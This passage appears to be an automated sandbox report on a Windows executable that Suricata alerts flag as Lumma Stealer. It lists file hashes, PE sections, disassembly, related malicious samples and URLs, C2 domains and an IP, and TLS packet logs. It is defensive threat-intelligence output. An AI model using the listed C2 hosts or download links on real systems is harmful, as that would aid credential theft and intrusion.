                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      02:14:01API Interceptor9x Sleep call for process: file.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      188.114.96.3VfKk5EmvwW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 083098cm.n9shteam.in/vmBase.php
                                                                      Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • filetransfer.io/data-package/CEqTVkxM/download
                                                                      0JLWNg4Sz1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 977255cm.nyashkoon.in/secureWindows.php
                                                                      zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                      • touxzw.ir/alpha2/five/fre.php
                                                                      QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • filetransfer.io/data-package/jI82Ms6K/download
                                                                      9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
                                                                      DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                      • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                      R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                      • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                      7950COPY.exeGet hashmaliciousFormBookBrowse
                                                                      • www.globaltrend.xyz/b2h2/
                                                                      transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                      • paste.ee/d/Gitmx

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      necklacedmny.storefile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      A & C Metrology OC 545714677889Materiale.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      • 104.21.74.191
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 172.64.41.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                      • 188.114.97.3
                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                      • 172.64.41.3
                                                                      file.exeGet hashmaliciousXmrigBrowse
                                                                      • 188.114.97.3

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousXmrigBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      HLZwUhcJ28.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.96.3

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      No created / dropped files found

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.520941886294137
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:file.exe
                                                                      File size:3'093'504 bytes
                                                                      MD5:900b4f529c53a8740d16c0372dc2ca9a
                                                                      SHA1:342f5cd2f6a7beecca59553f4d970454caa961ca
                                                                      SHA256:d22ac8685cb5b613bf5b6271239cd4c51b680d06a41f3c4d4d5aaefbf9ad5bc6
                                                                      SHA512:d7eb202fccbe787f75bead38810a34d641fd02a4a20505424d5acff45f2bf3971c426b845bfc21f7b3a228b7decde10b1fc2afec7cf9821038a44cd6fd1ee416
                                                                      SSDEEP:49152:IdFvViaekh4X2fR7S/YwI4bIBp2ptD1PH0a/eQGKH45:ILtiaeM4YRQYwI2/1HQ
                                                                      TLSH:52E55BA17545F2CBD4DA177888A7CD9AAAAD47B447208CC3AC3CB4BA7D73CD411B5C28
                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........@2...........@..........................p2.....^4/...@.................................T...h..

                                                                      File Icon

                                                                      Icon Hash:00928e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x724000
                                                                      Entrypoint Section:.taggant
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp 00007F3D5150C46Ah
                                                                      movlps xmm5, qword ptr [edi]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add cl, ch
                                                                      add byte ptr [eax], ah
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [edx+ecx], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      adc byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add al, 0Ah
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add al, 0Ah
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add dword ptr [eax+00000000h], eax
                                                                      add byte ptr [eax], al
                                                                      adc byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add dword ptr [edx], ecx
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x340.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      0x10000x580000x27e009cc7bcc6e5de53323f057b8dae2ed808False0.998046875data7.978424243223096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x590000x3400x400914cd139a383496d0085d499d138ef92False0.390625data4.997389973748798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      vphonoxp0x5b0000x2c80000x2c78005b7331717380705f77737da97305fed7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      aljcmtdz0x3230000x10000x6007dc2c0d1677637db72faa7d9520a1cb5False0.5631510416666666data4.924866201893006IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .taggant0x3240000x30000x22006e382267341306ea84ddc289d473d9c3False0.06284466911764706DOS executable (COM)0.6426252809168296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_MANIFEST0x590580x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397

                                                                      Imports

                                                                      DLLImport
                                                                      kernel32.dlllstrcpy

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-10-31T07:14:02.863132+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.5520901.1.1.153UDP
                                                                      2024-10-31T07:14:02.910872+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.5498891.1.1.153UDP
                                                                      2024-10-31T07:14:02.924571+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.5627851.1.1.153UDP
                                                                      2024-10-31T07:14:02.944497+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.5559221.1.1.153UDP
                                                                      2024-10-31T07:14:03.060815+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.5601071.1.1.153UDP
                                                                      2024-10-31T07:14:03.702728+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549704188.114.96.3443TCP
                                                                      2024-10-31T07:14:04.217328+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704188.114.96.3443TCP
                                                                      2024-10-31T07:14:04.217328+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704188.114.96.3443TCP
                                                                      2024-10-31T07:14:04.881356+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549705188.114.96.3443TCP
                                                                      2024-10-31T07:14:05.358191+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705188.114.96.3443TCP
                                                                      2024-10-31T07:14:05.358191+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.96.3443TCP
                                                                      2024-10-31T07:14:06.208818+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549706188.114.96.3443TCP
                                                                      2024-10-31T07:14:07.434036+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549707188.114.96.3443TCP
                                                                      2024-10-31T07:14:08.803736+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549708188.114.96.3443TCP
                                                                      2024-10-31T07:14:10.354086+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549709188.114.96.3443TCP
                                                                      2024-10-31T07:14:10.646203+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709188.114.96.3443TCP
                                                                      2024-10-31T07:14:11.771050+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549710188.114.96.3443TCP
                                                                      2024-10-31T07:14:14.835728+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549711188.114.96.3443TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 31, 2024 07:14:03.088968039 CET49704443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:03.089008093 CET44349704188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:03.089073896 CET49704443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:03.090658903 CET49704443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:03.090673923 CET44349704188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:03.702600956 CET44349704188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:03.702728033 CET49704443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:03.705935001 CET49704443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:03.705944061 CET44349704188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:03.706188917 CET44349704188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:03.757234097 CET49704443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:03.781121969 CET49704443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:03.781121969 CET49704443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:03.781220913 CET44349704188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:04.217346907 CET44349704188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:04.217433929 CET44349704188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:04.217516899 CET49704443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:04.219168901 CET49704443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:04.219168901 CET49704443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:04.219183922 CET44349704188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:04.219211102 CET44349704188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:04.283624887 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:04.283658028 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:04.283736944 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:04.284066916 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:04.284077883 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:04.881277084 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:04.881356001 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:04.882764101 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:04.882770061 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:04.882965088 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:04.884177923 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:04.884241104 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:04.884262085 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.358150005 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.358227015 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.358258963 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.358283043 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.358288050 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.358297110 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.358325958 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.358714104 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.358762980 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.358772993 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.362961054 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.362987041 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.363012075 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.363018990 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.363070011 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.473464012 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.473551035 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.473587036 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.473597050 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.473606110 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.473645926 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.473649025 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.473701000 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.473798037 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.473804951 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.473818064 CET49705443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.473820925 CET44349705188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.589592934 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.589637041 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:05.589725971 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.590135098 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:05.590151072 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.208739996 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.208817959 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.217298985 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.217314005 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.217524052 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.228998899 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.229217052 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.229250908 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.727040052 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.727147102 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.727202892 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.727382898 CET49706443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.727404118 CET44349706188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.827073097 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.827099085 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:06.827167988 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.827512980 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:06.827523947 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.433953047 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.434036016 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.435396910 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.435404062 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.435622931 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.437129021 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.437320948 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.437350035 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.437402964 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.437408924 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.962939978 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.962995052 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:07.963048935 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.963205099 CET49707443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:07.963212967 CET44349707188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.166610956 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.166660070 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.166759014 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.167100906 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.167114973 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.803617954 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.803735971 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.805366993 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.805377007 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.805605888 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.806809902 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.806936979 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.806969881 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:08.807030916 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:08.807040930 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:09.490211010 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:09.490319967 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:09.490379095 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:09.490513086 CET49708443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:09.490540981 CET44349708188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:09.739134073 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:09.739160061 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:09.739227057 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:09.739557028 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:09.739566088 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.354012966 CET44349709188.114.96.3192.168.2.5
                                                                      Oct 31, 2024 07:14:10.354085922 CET49709443192.168.2.5188.114.96.3
                                                                      Oct 31, 2024 07:14:10.355628014 CET49709443192.168.2.5188.114.96.3
